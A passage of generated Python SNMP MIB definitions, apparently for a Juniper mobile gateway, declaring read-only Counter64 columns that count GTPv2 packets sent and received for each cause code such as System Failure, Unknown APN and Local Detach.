jnxMbgSgwGtpV2ICsOptIEIncorrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 113), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrRx.setDescription('Number of GTPV2 packets received with cause Optional IE Incorrect.')
jnxMbgSgwGtpV2ICsOptIEIncorrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 114), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsOptIEIncorrTx.setDescription('Number of GTP packets sent with cause Optional IE Incorrect.')
jnxMbgSgwGtpV2ICsSysFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 115), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailRx.setDescription('Number of GTPV2 packets received with cause System Failure.')
jnxMbgSgwGtpV2ICsSysFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 116), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSysFailTx.setDescription('Number of GTP packets sent with cause System Failure.')
jnxMbgSgwGtpV2ICsNoResRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 117), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResRx.setDescription('Number of GTPV2 packets received with cause No Resource.')
jnxMbgSgwGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
jnxMbgSgwGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwGtpV2ICsPkFltManErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwGtpV2ICsPkFltManErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwGtpV2ICsPkFltSynErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwGtpV2ICsPkFltSynErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwGtpV2ICsDeniedINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwGtpV2ICsDeniedINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwGtpV2ICsAllDynAdOccRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwGtpV2ICsAllDynAdOccTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
jnxMbgSgwGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
jnxMbgSgwGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch')
jnxMbgSgwGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
# From here on the descriptions switch wording from 'GTPV2 packets' to
# 'GTP packets' (session-management / detach / TAD cause counters).
jnxMbgSgwGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADRx.setStatus('current')
